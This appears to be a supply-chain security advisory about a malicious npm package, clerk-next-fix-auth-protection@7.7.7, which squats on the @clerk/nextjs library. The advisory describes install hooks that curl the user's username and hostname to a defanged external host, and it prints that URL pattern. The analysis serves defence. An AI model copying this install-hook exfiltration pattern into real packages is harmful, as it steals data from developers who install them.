clerk-next-fix-auth-protection@7.7.7
Malicious code in clerk-next-fix-auth-protection (npm)
T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel
Analysis
Dependency-confusion combosquat targeting the @clerk/nextjs authentication library. The package ships no functional code — only a package.json with preinstall and postinstall hooks that curl the installer's username and hostname to hxxp://u3ukeehm[.]requestrepo[.]com/depconf/clerk-next-fix-auth-protection/?u=$(whoami)&h=$(hostname). The high version number (7.7.7) is designed to take precedence over the legitimate package in automatic resolution. The C2 beacon host is u3ukeehm[.]requestrepo[.]com.
- analyzed by
- Leitwacht
- first seen
- Jul 24, 2026, 09:16 PM
- analyzed
- Jul 24, 2026, 09:16 PM
Related advisories
- app-sim-layer@2.1.6
- app-node-layer@2.1.6
- shift-v4-sdk@1.0.5
- shift-sdk-v5@5.0.1
- shiftmarkets-sdk@2.1.0
- @cryptosrvc/shift-exchange-root@3.9.9
- @cryptosrvc/shift-sdk-v4@1.0.77
- @cryptosrvc/no-brainer-sdk@1.0.18
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.